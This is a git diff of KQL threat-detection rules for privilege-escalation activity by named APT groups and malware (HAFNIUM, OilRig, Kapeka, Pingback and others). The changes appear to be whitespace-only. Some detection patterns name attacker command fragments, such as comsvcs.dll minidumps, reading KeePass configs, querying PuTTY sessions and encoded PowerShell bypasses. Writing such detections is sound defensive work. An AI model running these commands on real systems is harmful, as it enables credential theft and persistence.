Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql 
@@ -1,13 +1,13 @@ -// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-23 -// Level: high -// Description: Detects the setting of the DLL that handles the custom protocol handler. -// Seen being created by Forest Blizzard APT as reported by MSFT. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the setting of the DLL that handles the custom protocol handler. +// Seen being created by Forest Blizzard APT as reported by MSFT. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData endswith ".dll" and RegistryKey contains "\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql index 00179650..1e7b3461 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql 
@@ -1,12 +1,12 @@ -// Title: HAFNIUM Exchange Exploitation Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-09 -// Level: critical -// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HAFNIUM Exchange Exploitation Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-09 +// Level: critical +// Description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1546, attack.t1053, attack.g0125, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -t7z " and ProcessCommandLine contains "C:\\Programdata\\pst" and ProcessCommandLine contains "\\it.zip") or (ProcessCommandLine contains "attrib" and ProcessCommandLine contains " +h " and ProcessCommandLine contains " +s " and ProcessCommandLine contains " +r " and ProcessCommandLine contains ".aspx") or ((ProcessCommandLine contains "inetpub\\wwwroot\\" and ProcessCommandLine contains ".dmp.zip") and FolderPath endswith "\\makecab.exe") or ((ProcessCommandLine contains "Microsoft\\Exchange Server\\" or ProcessCommandLine contains "compressionmemory" or ProcessCommandLine contains ".gif") and FolderPath endswith "\\makecab.exe") or (FolderPath endswith "Opera_browser.exe" and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")) or FolderPath endswith "Users\\Public\\opera\\Opera_browser.exe" or (ProcessCommandLine contains "Windows\\Temp\\xx.bat" or 
ProcessCommandLine contains "Windows\\WwanSvcdcs" or ProcessCommandLine contains "Windows\\Temp\\cw.exe") or (ProcessCommandLine contains "\\comsvcs.dll" and ProcessCommandLine contains "Minidump" and ProcessCommandLine contains "full " and ProcessCommandLine contains "\\inetpub\\wwwroot") or (FolderPath contains "\\ProgramData\\VSPerfMon\\" or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "VSPerfMon")) or (ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "Temp\\__output") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql index 69a250e6..47eabde4 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql 
@@ -1,13 +1,13 @@ -// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity -// Author: @kostastsale -// Date: 2023-08-07 -// Level: high -// Description: Detects the execution of installed GuLoader malware on the host. -// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Injected Browser Process Spawning Rundll32 - GuLoader Activity +// Author: @kostastsale +// Date: 2023-08-07 +// Level: high +// Description: Detects the execution of installed GuLoader malware on the host. +// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine endswith "\\rundll32.exe" and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql index 8c3c6f0c..494481e5 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql 
@@ -1,12 +1,12 @@ -// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-22 -// Level: critical -// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats -// False Positives: -// - Possibly some Microsoft Edge upgrades - -DeviceFileEvents +// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats +// False Positives: +// - Possibly some Microsoft Edge upgrades + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\msiexec.exe" and FolderPath endswith "\\elevation_service.exe" and FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql index 725f8d15..ad21478e 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql 
@@ -1,10 +1,10 @@ -// Title: Kapeka Backdoor Autorun Persistence -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-03 -// Level: high -// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats - -DeviceRegistryEvents +// Title: Kapeka Backdoor Autorun Persistence +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceRegistryEvents | where (RegistryValueData contains ":\\WINDOWS\\system32\\rundll32.exe" and RegistryValueData contains ".wll" and RegistryValueData contains "#1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and (RegistryKey endswith "\\Sens Api" or RegistryKey endswith "\\OneDrive") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql index 938fdaf6..a11223a9 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql 
@@ -1,16 +1,16 @@
-// Title: Kapeka Backdoor Persistence Activity
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-07-03
-// Level: high
-// Description: Detects Kapeka backdoor persistence activity.
-// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
-// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
-// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
-// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Kapeka Backdoor Persistence Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor persistence activity.
+// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
+// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
+// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
+// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "create" and ProcessCommandLine contains "ONSTART") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) or ((ProcessCommandLine contains "add" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe"))) and ((ProcessCommandLine contains "Sens Api" or ProcessCommandLine contains "OneDrive") and (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql
index 5fcfcb55..8766ef2a 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql
@@ -1,10 +1,10 @@
-// Title: Leviathan Registry Key Activity
-// Author: Aidan Bracher
-// Date: 2020-07-07
-// Level: critical
-// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Leviathan Registry Key Activity
+// Author: Aidan Bracher
+// Date: 2020-07-07
+// Level: critical
+// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
index af3d2ddb..c2c2117e 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
@@ -1,12 +1,12 @@
-// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-12-19
-// Level: high
-// Description: Detects the execution of more.com and vbc.exe in the process tree.
-// This behavior was observed by a set of samples related to Lummac Stealer.
-// The Lummac payload is injected into the vbc.exe process.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: Detects the execution of more.com and vbc.exe in the process tree.
+// This behavior was observed by a set of samples related to Lummac Stealer.
+// The Lummac payload is injected into the vbc.exe process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\vbc.exe" or ProcessVersionInfoOriginalFileName =~ "vbc.exe") and InitiatingProcessFolderPath endswith "\\more.com"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
index 8e7dbbd1..88d627da 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql
@@ -1,15 +1,15 @@
-// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
-// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
-// Date: 2025-10-02
-// Level: high
-// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
-// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
-// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
-// potentially leading to arbitrary code execution and privilege escalation.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats
-// False Positives:
-// - Backup locations
-
-DeviceFileEvents
+// Title: Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation
+// Author: Swachchhanda Shrawn Poudel (Nextron Systems)
+// Date: 2025-10-02
+// Level: high
+// Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463.
+// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations.
+// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment,
+// potentially leading to arbitrary code execution and privilege escalation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats
+// False Positives:
+// - Backup locations
+
+DeviceFileEvents
 | where FolderPath endswith "/etc/nsswitch.conf" and (not(FolderPath =~ "/etc/nsswitch.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql
index 9f188472..cbfa9fa2 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql
@@ -1,12 +1,12 @@
-// Title: OilRig APT Activity
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018-03-23
-// Level: critical
-// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: OilRig APT Activity
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2018-03-23
+// Level: critical
+// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "nslookup.exe" and ProcessCommandLine contains "-q=TXT") and InitiatingProcessFolderPath endswith "\\local\\microsoft\\Taskbar\\autoit3.exe") or (ProcessCommandLine contains "SC Scheduled Scan" and ProcessCommandLine contains "\\microsoft\\Taskbar\\autoit3.exe") or ((ProcessCommandLine contains "i" or ProcessCommandLine contains "u") and FolderPath =~ "C:\\Windows\\system32\\Service.exe") or (FolderPath contains "\\Windows\\Temp\\DB\\" and FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql
index bd67c52b..da5c71ca 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql
@@ -1,12 +1,12 @@
-// Title: OilRig APT Registry Persistence
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
-// Date: 2018-03-23
-// Level: critical
-// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: OilRig APT Registry Persistence
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+// Date: 2018-03-23
+// Level: critical
+// Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql
index 2c629abe..f220cfaa 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql
@@ -1,12 +1,12 @@
-// Title: Operation Wocao Activity
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2019-12-20
-// Level: high
-// Description: Detects activity mentioned in Operation Wocao report
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats
-// False Positives:
-// - Administrators that use checkadmin.exe tool to enumerate local administrators
-
-DeviceProcessEvents
+// Title: Operation Wocao Activity
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2019-12-20
+// Level: high
+// Description: Detects activity mentioned in Operation Wocao report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.discovery, attack.t1012, attack.defense-evasion, attack.t1036.004, attack.t1027, attack.execution, attack.t1053.005, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Administrators that use checkadmin.exe tool to enumerate local administrators
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "checkadmin.exe 127.0.0.1 -all" or ProcessCommandLine contains "netsh advfirewall firewall add rule name=powershell dir=in" or ProcessCommandLine contains "cmd /c powershell.exe -ep bypass -file c:\\s.ps1" or ProcessCommandLine contains "/tn win32times /f" or ProcessCommandLine contains "create win32times binPath=" or ProcessCommandLine contains "\\c$\\windows\\system32\\devmgr.dll" or ProcessCommandLine contains " -exec bypass -enc JgAg" or (ProcessCommandLine contains "type " and ProcessCommandLine contains "keepass\\KeePass.config.xml") or ProcessCommandLine contains "iie.exe iie.txt" or (ProcessCommandLine contains "reg query HKEY_CURRENT_USER\\Software\\" and ProcessCommandLine contains "\\PuTTY\\Sessions\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql
index 58ba9e91..f6d934a8 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql
@@ -1,12 +1,12 @@
-// Title: Pingback Backdoor Activity
-// Author: Bhabesh Raj
-// Date: 2021-05-05
-// Level: high
-// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Pingback Backdoor Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "config" and ProcessCommandLine contains "msdtc" and ProcessCommandLine contains "start" and ProcessCommandLine contains "auto") and InitiatingProcessFolderPath endswith "\\updata.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql
index 8d1491ae..59429104 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql
@@ -1,12 +1,12 @@
-// Title: Pingback Backdoor DLL Loading Activity
-// Author: Bhabesh Raj
-// Date: 2021-05-05
-// Level: high
-// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Pingback Backdoor DLL Loading Activity
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath =~ "C:\\Windows\\oci.dll" and InitiatingProcessFolderPath endswith "\\msdtc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql
index 5a037b2f..5a1d7091 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Pingback Backdoor File Indicators
-// Author: Bhabesh Raj
-// Date: 2021-05-05
-// Level: high
-// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Pingback Backdoor File Indicators
+// Author: Bhabesh Raj
+// Date: 2021-05-05
+// Level: high
+// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "updata.exe" and FolderPath =~ "C:\\Windows\\oci.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql
index 1f97923c..daa38ffa 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential ACTINIUM Persistence Activity
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2022-02-07
-// Level: high
-// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential ACTINIUM Persistence Activity
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "create" and ProcessCommandLine contains "wscript" and ProcessCommandLine contains " /e:vbscript"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql
index a65a97a6..f9fc009f 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2021-41379 Exploitation Attempt
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-11-22
-// Level: critical
-// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential CVE-2021-41379 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-22
+// Level: critical
+// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\elevation_service.exe")
\ No newline at end of file
